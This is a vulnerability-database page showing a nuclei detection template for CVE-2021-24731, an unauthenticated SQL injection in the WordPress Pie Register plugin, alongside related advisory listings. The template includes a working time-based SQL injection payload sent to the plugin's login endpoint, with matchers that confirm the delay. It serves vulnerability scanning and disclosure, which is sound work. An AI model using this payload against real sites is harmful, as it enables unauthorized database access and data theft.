Lucene search
K

Pie Register < 3.7.1.6 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

Pie Register plugin < 3.7.1.6 SQL Injection vulnerability in wp-json/pie/v1/login endpoint allows arbitrary SQL queries executio

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress SQL注入漏洞
8 Nov 202100:00
cnnvd
Check Point Advisories
WordPress Pie Register Plugin SQL Injection (CVE-2021-24731)
24 Nov 202100:00
checkpoint_advisories
CVE
CVE-2021-24731
8 Nov 202117:35
cve
Cvelist
CVE-2021-24731 Pie Register < 3.7.1.6 - Unauthenticated SQL Injection
8 Nov 202117:35
cvelist
NVD
CVE-2021-24731
8 Nov 202118:15
nvd
OSV
CVE-2021-24731
8 Nov 202118:15
osv
Patchstack
WordPress Pie Register plugin <= 3.7.1.5 - Unauthenticated SQL Injection (SQLi) vulnerability
11 Oct 202100:00
patchstack
Prion
Sql injection
8 Nov 202118:15
prion
RedhatCVE
CVE-2021-24731
22 May 202519:23
redhatcve
wpexploit
Pie Register < 3.7.1.6 - Unauthenticated SQL Injection
11 Oct 202100:00
wpexploit
Rows per page
id: CVE-2021-24731

info:
  name: Pie Register < 3.7.1.6 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version 3.7.1.6
  reference:
    - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a
    - https://wordpress.org/plugins/pie-register/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24731
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24731
    cwe-id: CWE-89
    epss-score: 0.07542
    epss-percentile: 0.93776
    cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: genetechsolutions
    product: pie_register
    framework: wordpress
  tags: time-based-sqli,cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions,vuln

http:
  - raw:
      - |
        @timeout: 10s
        POST /wp-json/pie/v1/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "User credentials are invalid.")'
        condition: and
# digest: 4a0a00473045022100db2b4b2a973a660a2e52d4862adc48bd35cc76adc8b57d38533400774e5c1842022002dcf912287ba277b59196869e77c1fec2f0cbf11e304813e29682630d717edd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.07542
27